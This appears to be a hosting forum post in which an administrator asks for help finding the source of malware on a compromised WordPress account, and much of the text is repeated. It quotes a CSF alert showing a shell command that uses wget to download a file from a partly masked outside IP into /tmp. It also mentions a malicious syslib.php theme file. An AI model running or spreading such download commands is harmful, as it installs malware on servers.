Hi guys,
I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious however I can't seem to find the culprit file and need some help please.
I am particularly worried about the calls to that IP ^ (176.119.x.xx). I tried getting some info on it, and can only find that it's based in the Ukraine and some suspicious reports on it but nothing definitive.
Another thing I'm finding in CSF logs are from the same client account:
Executable: /usr/bin/php
Command Line: /usr/bin/php /home/c150102a/public_html/wp-content/themes/main-theme/syslib.php
I opened the syslib.php file and it was indeed a bad file. I got rid of it but I'm still getting the log in csf. Does this mean something is still trying to run this file?
I have updated all wordpress files on this specific account (c150102a) and removed all but 3 plugins which I know aren't the cause. I've run some scanners and can't find any bad scripts or any files containing the above commands.
So my question is, what is my next step apart from removing the account all together? I'm not sure how to find what is making calling that command? Is there any way I can find the culprit?
I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious however I can't seem to find the culprit file and need some help please.
Code:
Time: Wed Oct 26 02:00:21 2016 +1100
Account: c150102a
Resource: Process Time
Exceeded: 3026245 > 1800 (seconds)
Executable: /usr/bin/bash
Command Line: [B]sh -c cd /tmp ; /usr/bin/wget -t0 -c [URL]http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766[/URL] 1> /dev/null 2> /dev/null && echo OK[/B]
PID: 2261 (Parent PID:2260)
Killed: No
Another thing I'm finding in CSF logs are from the same client account:
Executable: /usr/bin/php
Command Line: /usr/bin/php /home/c150102a/public_html/wp-content/themes/main-theme/syslib.php
I opened the syslib.php file and it was indeed a bad file. I got rid of it but I'm still getting the log in csf. Does this mean something is still trying to run this file?
I have updated all wordpress files on this specific account (c150102a) and removed all but 3 plugins which I know aren't the cause. I've run some scanners and can't find any bad scripts or any files containing the above commands.
So my question is, what is my next step apart from removing the account all together? I'm not sure how to find what is making calling that command? Is there any way I can find the culprit?
Last edited by a moderator: